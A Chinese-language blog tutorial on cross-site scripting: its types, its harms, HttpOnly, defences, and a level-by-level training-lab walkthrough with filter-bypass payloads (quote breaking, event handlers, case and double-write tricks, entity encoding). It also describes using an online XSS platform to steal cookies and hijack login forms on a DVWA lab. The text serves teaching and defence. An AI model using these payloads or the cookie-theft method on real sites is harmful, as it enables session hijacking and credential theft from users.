xss跨站脚本攻击总结

news2024/12/23 5:56:53

XSS(跨站脚本攻击)

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )CSS的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码就会被执行,从而达到恶意攻击用户的目的。

原理

SQL注入是服务端将用户输入的数据当成SQL代码去执行

XSS可以理解为服务端把用户输入的数据当成前端代码去执行。 前端代码(JS代码)

利用条件

第一个就是用户能控制输入

第二个是原本程序要执行的代码,拼接了用户输入的数据

XSS主要拼接什么?

SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:XSS就是拼接恶意的HTML)

XSS的危害

获取用户信息(如浏览器信息、IP地址、cookie信息等),盗取cookie(用的最频繁的) cookie相当于一个人的身份证。

钓鱼(利用XSS漏洞构造出一个登录框,骗取用户账号密码,提示登录过期,模拟一个网站的登录框,将用户名。密码发送到攻击者服务器。)

后台增删改网站数据等操作(配合CSRF漏洞,骗取用户点击,利用js模拟浏览器发包)

xss糯虫(微博糯虫:只要看过某人的微博就是自动关注某人;贴吧糯虫:看过某个帖子就是自动回复这个帖子)

获取内网IP(攻击内网)

获取浏览器保存的明文密码

截取网页屏幕

网页上的键盘记录

钓鱼

1、反射型

反射型XSS又称非持久性XSS,这种攻击往往具有一次性;参数型跨站脚本

主要存在于攻击者将恶意脚本附加到url的参数中,发送给受害者,服务端未经严格过滤处理而输出在用户浏览器中,导致浏览器执行代码数据。

攻击流程:1、攻击者发现反射型xss的url 2、根据输出点环境构造xss代码 3、进行编码、缩短(为了增加迷惑性) 4、发送给受害者 5、受害者点开链接,xss代码执行 ,完成攻击者代码功能。

攻击者通过邮件等形式将包含XSS代码的链接发给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有XSS的代码发送给用户。用户浏览器解析执行代码,触发XSS漏洞。

<script>alert(1)</script>    这个代码弹窗成功,意味着我们的HTML代码可以执行

提交的数据成功的实现了XSS,但是仅仅是对这次访问产生了影响,是非持久型攻击

<script>alert(document.cookie)</script>    这个代码就是盗取cookie

可用于钓鱼、引流、配合其他漏洞如CSRF等

怎么去寻找反射型xss?或者反射型xss的利用场景

见框就插,修改url参数。

Payload
经典测试  <sciprt>alert('hack')</script>
大写绕过  <SCRIPT>alert('hack')</SCRIPT>
双写绕过  <scr<script>ipt>alert("xss")</script>
其他标签  <img src=1 onerror=alert('hack')/>

2、存储型

存储型XSS又称持久性XSS,攻击脚本存储在目标服务器的数据库中,具有更强的隐蔽性。

主要存在于攻击者将恶意脚本存储到服务器数据库中,当用户访问包含恶意相关数据的页面时,服务端未经严格过滤处理而输出在用户浏览器中,导致浏览器执行代码数据。

多见于评论留言,个人信息等处。

攻击者在论坛、博客、留言板中,发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数据库中。当用户进行正常访问时,触发XSS代码。

<script>alert(document.cookie)</script>

攻击范围广,流量传播大,可配合其他漏洞。

3、DOM型

HTML标签都是节点,节点组成了节点树。通过HTML DOM 可以对树上的所有节点进行修改。

服务器响应不会处理攻击者脚本,而是用户浏览器处理这个响应时,DOM对象就会处理XSS代码,触发XSS漏洞。

通过JavaScript操作document,实现dom树的重构。主要存在于用户能修改页面的dom,造成客户端padload在浏览器中执行。

4、HTTPonly

什么是httponly?

如果你在cookie中设置了httponly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止xss攻击。

ps:只是防止cookie被读取,一定程度上防止xss攻击,但是并不能阻止xss攻击。或者阻止xss漏洞。

如果httponly开启之后,怎么去拿到后台?由于是拿到后台

有两种思路:

1、cookie获取进入后台

2、直接账号密码登录

(1)保存读取

利用xss去读取网站保存的信息

xss有个模块就是获取保存的明文账号密码。

(2)未保存读取

通过表单劫持,也就是让网站在输入账号密码发送数据包的时候,再发送一份给xss平台。

但是这里需要注意的是,此时的xss漏洞要存在于登陆框,如果不在登陆框,那么也是不行的。

5、利用xss平台

利用XSS平台,然后就可以开始操作了。

xss平台自己搭建,或者使用别人搭建好的线上的。推荐线上https://xss.yt

但是线上不好的地方就是,你这里面的数据,别人能看到。

第一步先创建项目

image-20230711233356682

第二步勾选配置

这里直接勾选第一个配置就行。

image-20230711233452179

第三步点击右上角查看代码

image-20230711233716678

然后直接复制第一个代码到,有xss的地方。这里我们使用dvwa的存储型靶场。

image-20230711233840213

刷新页面之后。

回到我们的xss平台。

image-20230711233935559

发现我们界面被截图,而且得到了cookie,浏览器信息很多。

6、防御

1、阻止恶意代码注入

2、阻止恶意操作执行

不管是反射型还是存储型xss,都能通过服务端过滤进行防御。

黑名单:过滤特殊符号及字符

如< > % # / " ’ ; ( ) script svg object on事件等

白名单:只允许特定类型或符号

编码及转义

输出在标签或属性中进行HTML编码;

输出在script标签或事件中进行JavaScript编码

输出在url中进行url编码

cookie中设置httponly

setcookie将httponly选项设置为ture,防范cookie劫持

确保执行脚本来源可信

开发者明确告诉客户端,哪些外部资源可以加载和执行。

不使用有缺陷的第三方库

7、XSS靶场

1、无过滤

没有任何过滤,直接在get请求方式的参数name中写入

<sciprt>alert(1)</script>

2、有双引号

发现在代码中,存在双引号,我们输入的代码会被写入到value" " 里面

<input name=keyword  value="test">

所以构造payload

test"><script>alert(1)</script>"
或者
test"><script>alert(1)</script>//     //这是注释符的意思

<input name=keyword  value="test">   <script>alert(1)</script>  "">  这样就完成了闭合

3、有单引号而且<>被过滤

<input name=keyword  value='test123'>	

发现这是一个单引号闭合。

test'><script>alert(1)</script>'
或者
test'><script>alert(1)</script>//

<input name=keyword  value='test'>    <script>alert(1)</script>    ''>	

但是问题并没有这么简单,这不是一个简单的单引号闭合,而是<>也被过滤了。

查看源代码发现有这个函数 htmlspecialchars

这个函数的功能就是将特殊字符转换为HTML实体。

所以在构造payload的时候,不能使用带有< > " ’ 等字符

(1)构造标签事件进行过滤

因为返回值在input标签中,所以尝试构造onclick事件触发xss

' onclick=alert(1)//    前面的' 是为了闭合前面的'

<input name=keyword  value=''  onclick=alert(1)   //'>	

这里为什么存在htmlspecialchars函数,但是' 还是没有被过滤?

扩展:

如果在过滤时.htmlspecialchars加上ENT_QUOTES选项的话则无法进行xss注入,因为这里的 ’ 也被转换,导致引号无法闭合,无法执行注入语句。

(2)构造JavaScript伪协议
' onmouseover='javascript:alert(1)'

4、双引号而且<>被过滤

(1)javascript伪协议
" onmouseover='javascript:alert(1)"     由于这里是双引号闭合,所以前面需要双引号   
(2)构造标签事件进行过滤
" onclick=alert(1)//

这里是通过对< >进行替换,没有使用函数。所以上面的两个方法还是能实现。

5、过滤了script和on

也就是我们上面的两个方法都不能使用了。但是没有过滤<>

<input name=keyword  value="tset">

尝试利用没有过滤尖括号,构造a标签再尝试利用a标签的href属性执行javascript:伪协议,

"><a href='javascript:alert(1)'>//

<input name=keyword  value="tset">

<input name=keyword  value="">  
<a href='javascript:alert(1)'>//">

没有对javascript进行过滤,触发xss

6、过滤了script和on还有href

"><a HREF='javascript:alert(1)'>//

利用大小写HREF绕过

7、将特殊符替换为空

这里将script、on、src、data、href直接替换为空。同时将大写转为小写,也就是大小写绕过也被禁止了。

但是由于只替换了一次,所以通过双写就能绕过。

" oonnclick="alert(1)"//    由于on被替换,但是只替换一次

" onclick="alert(1)"//     而且从左向右,所以中间的on被替换为空

同时还可以使用 JavaScript伪协议

" oonnmouseover="javascscriptript:alert(1)"//

同理 构造a标签

" /><a hrhrefef="javascscriptript:alert(1)">a</a>//

8、基本过滤完全

不仅把script、on、data、src、href直接过滤了,大小写也被过滤,还将 " 双引号替换为空。

大部分的弹窗函数都被过滤掉,这时我们只能HTML实体化。

javascript:alert(1)   实体化为
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

由于在搜索框的注入点,过滤很完全,所以另寻办法找其他注入点。

所以需要先添加友情链接,然后在友情链接那里,进行绕过,然后弹窗

9、检查http://

这里不仅过滤了第八关的,而且还会在我们添加友情链接的时候检查有没有http://,如果有那么才是有效链接。

那么我们直接在后面加上http://,再把http://注释。

&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)//http://

10、更换注入点

发现没有了框,但是是GET请求方式,有变量keyword。

但是在keyword变量这里怎么注入都不行。

查看源码发现还有一个变量,为t_sort,而且在t_sort变量中过滤了<>

onclick="alert(1)"// 

所以在变量t_sort后面value后面加上 οnclick=“alert(1)”// 并且将type由hidden改为text,然后输入框就显示出来了,再去点击输入框即可。

11、ng-include

12、img

通常使用于script被过滤的情况下。

<img%0asrc=123%0aonerror=alert(1)>

%0a是因为过滤了空格的原因,如果没有过滤空格,那么就不需要%0a

13、注释过滤

这一招是在dvwa的中等medium模式下学到的

井号在php中是单行注释,提交时会将后面的内容注释掉,但是也会带入到html当中当作js代码执行

14、弹窗语句总结

<script>alert(1)</script>
<a href="javascript:alert(1)">aaaa</a>
<img src=1 onerror="alert(1)">
<svg onload="alert(1)">  //onerror    当加载文档或图像时发生某个错误
<iframe src="javascript:alert(1)"></iframe>
<iframe onload="alert(1)"></iframe>
 
无<>的弹窗语句
onclick="alert(1)"     //鼠标单击事件
onmouseover="alert(1)" //鼠标悬浮事件

最后还有很多的绕过姿势,推荐博客

https://blog.csdn.net/qq_53079406/article/details/123901260

cookie:存储本地   存活时间较长  小中型
session: 会话  存储服务器  存活时间较短  大型企业使用

ps:这里啊有个问题,如果网站是通过session验证,那么用xss是无法盗取管理者的seesion,因为seesion是存储到服务器的,而没有存储到本地。

但是呢,还有一个问题就是,如果能操作网站去访问phpinfo界面,在phpinfo界面里,存在cookie,而在这个cookie里面,就有seesion。 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/761435.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

047、TiDB特性_TopSQL

TopSQL 之前 之前没有办法找单个TiKV Server的语句。只能查找整个集群的慢语句。 TopSQL之后 指定TiDB及TiKV实例正在执行的SQL语句CPU开销最多的Top 5 SQL每秒请求数、平均延迟等信息 TopSQL 使用 选择需要观察负载的具体TiDB Server或TiKV实例 观察Top 5 类SQL 查看某…

Linux 自动化构建工具(make/Makefile)

绪论 拼着一切代价&#xff0c;奔你的前程。——巴尔扎克. 本章继续学习Linux常用的工具&#xff0c;make是可以帮我们解决一些重复使用相同指令的冗杂的自动化构建工具。 话不多说安全带系好&#xff0c;发车啦&#xff08;建议电脑观看&#xff09;。 附&#xff1a;红色&…

TortoiseGit 入门指南08:浏览引用以及在引用间切换

在上一节 创建分支 中&#xff0c;我们学会了在分支上开发新功能&#xff0c;那么随之而来的问题是&#xff1a;如何查看项目又多少分支&#xff1f;如何再切换到主分支&#xff1f;这节来解决这些问题。 在回答之前&#xff0c;需要先了解一个 Git 术语&#xff1a;引用&…

学无止境·MySQL⑨(MongoDB)

MongoDB的安装及使用 MongoDB1、MongoDB的安装与启动2、创建一个数据库 名字grade3、数据库中创建一个集合名字 class4、集合中插入若干数据文档格式如下5、查找查看班级所有人信息查看班级中年龄为8岁的学生信息查看年龄大于10岁的学生信息查看年龄在 4---8岁之间的学生信息找…

接口测试之基于SaaS平台的iHRM项目的前端部署配置(踩坑版)

基于SaaS平台的iHRM项目的前端部署配置 下载安装node.js3.从Git上下载项目安装依赖包的改进方法 关于的部署可以参考基于SaaS平台的iHRM项目的前端部署教程博客 但本人在参考配置的过程中遇到了很多问题…于是写下这篇博客 下载安装node.js 可以访问https://nodejs.org/en下载…

利用Python绘制直方图和散点图

1 问题 利用python如何绘制直方图和散点图。 2 方法 # ------ 直方图import matplotlib.pyplot as pltimport numpy as npimport matplotlib# 设置matplotlib正常显示中文和负号matplotlib.rcParams[font.sans-serif] [SimHei] # 用黑体显示中文matplotlib.rcParams[axes.unic…

前端学习记录~2023.7.3~CSS杂记 Day4

前言一、溢出1. 默认情况2. overflow属性3. BFC 二、CSS 的值与单位1. 长度&#xff08;1&#xff09;绝对长度单位&#xff08;2&#xff09;相对长度单位 2、百分比3、数字4、颜色&#xff08;1&#xff09;颜色关键字&#xff08;2&#xff09;十六进制 RGB 值&#xff08;3…

单片机第一季:零基础7——定时器和计时器

目录 1&#xff0c;单片机定时器原理 2&#xff0c;51单片机定时器/计数器结构 3&#xff0c;定时器配置 4&#xff0c;示例代码-通过定时器控制LED灯间隔1s闪烁 51 单片机有两组定时器/计数器&#xff0c;因为既可以定时&#xff0c;又可以计数&#xff0c;故称之为定时…

JPA实现多对多关系

本文已收录于专栏 《Java》 目录 概念说明优势利弊实现方式通过两个ManyToMany注解实现类图代码 通过OneToMany和ManyToOne注解实现类图代码 总结提升 概念说明 多对多关系是指两个实体之间存在多对多的关联关系。在数据库中&#xff0c;多对多关系无法直接表示&#xff0c;需要…

javascript截取两个符号之间的字符串(2):lastIndexOf匹配和正则表达式匹配

lastIndexOf匹配和正则表达式匹配 项目需求1.规范的字符串2.不规范的字符串3-1.万能封装3-2.ChatGPT的优化写法4.正则表达式的用法5.补充知识&#xff1a;lastIndexOf的用法 项目需求 javascript中截取字符串中最后一个“/”和“?”之间的内容。 1.规范的字符串 https://tes…

100天精通Python(可视化篇)——第96天:Pyecharts绘制多种炫酷箱形图参数说明+代码实战

文章目录 专栏导读1. 箱形图介绍1&#xff09;箱形图介绍2&#xff09;怎么看箱型图&#xff1f;3&#xff09;解释说明 2. 普通箱型图3. 水平箱型图4. 群组箱型图5. 带异常点的箱型图 专栏导读 &#x1f525;&#x1f525;本文已收录于《100天精通Python从入门到就业》&#…

Docker实战总结

Docker 官方文档地址:https://www.docker.com/get-started 中文参考手册:https://docker_practice.gitee.io/zh-cn/ 1.什么是 Docker 1.1 官方定义 最新官网首页 # 1.官方介绍 - We have a complete container solution for you - no matter who you are and where you are…

线性回归--波士顿房屋价格预测

一、波士顿房屋价格预测代码 import sysimport pandas as pd import numpy as np from sklearn.linear_model import LinearRegression import matplotlib.pyplot as plt import matplotlib as mpt from sklearn.model_selection import train_test_split##加载数据 datapd.re…

Druid工作原理

Druid工作原理-连接池初始化流程 标题 Druid工作原理-获取连接流程&#xff1a; 连接回收:

类定义练习

运行代码&#xff1a; //类定义练习 #include"std_lib_facilities.h" #include"GUI/Simple_window.h" #include"GUI/GUI.h" #include"GUI/Graph.h" #include"GUI/Point.h" //定义类 class Person { private:string first_n…

直流有刷驱动板电流电压采集

直流有刷驱动板电流电压采集 电流采集会涉及到电流环的使用。 #include "./adc/bsp_adc.h" #include ".\motor_control\bsp_motor_control.h" #include "./led/bsp_led.h" #include "./usart/bsp_debug_usart.h"__IO uint16_t…

vue-element-admin深入系列-数据Mock

本文介绍 vue-element-admin 如何使用 MockJS 实现数据Mock,毕竟对于一个合格的前端来讲,自己能Mock数据是必须的: 自给自足,不用依赖服务端接口。毕竟环境问题是个大问题,更何况环境不稳定是常态,再加上偶尔服务端的数据格式变化,问题就更复杂。 数据复杂,页面复杂时。…

HackTheBox - 学院【CPTS】复习6 - Active Directory

ACTIVE DIRECTORY ENUMERATION & ATTACKS 这个模块其实与thm的AD教程相比&#xff0c;还是thm更适合刚开始接触AD以及学习从枚举到持久化的全阶段&#xff08;红队&#xff09;。而htb学院这个模块更注重于枚举和各种攻击手段&#xff0c;有点纯渗透的风格&#xff0c;弱化…

通过动态IP解决网络数据采集问题

动态地址的作用 说到Python网络爬虫&#xff0c;很多人都会遇到困难。最常见的就是爬取过程中IP地址被屏蔽。虽然大部分都是几个小时内自动解封的&#xff0c;但这对于分秒必争的python网络爬虫来说&#xff0c;是一个关键性的打击&#xff01;当一个爬虫被阻塞时&#xff0c;…

Java内部类笔记

1.为什么使用内部类? 使用内部类最吸引人的原因是&#xff1a;每个内部类都能独立地继承一个&#xff08;接口的&#xff09;实现&#xff0c;所以无论外围类是否已经继承了某个&#xff08;接口的&#xff09;实现&#xff0c; 对于内部类都没有影响 1.1.使用内部类最大的优点…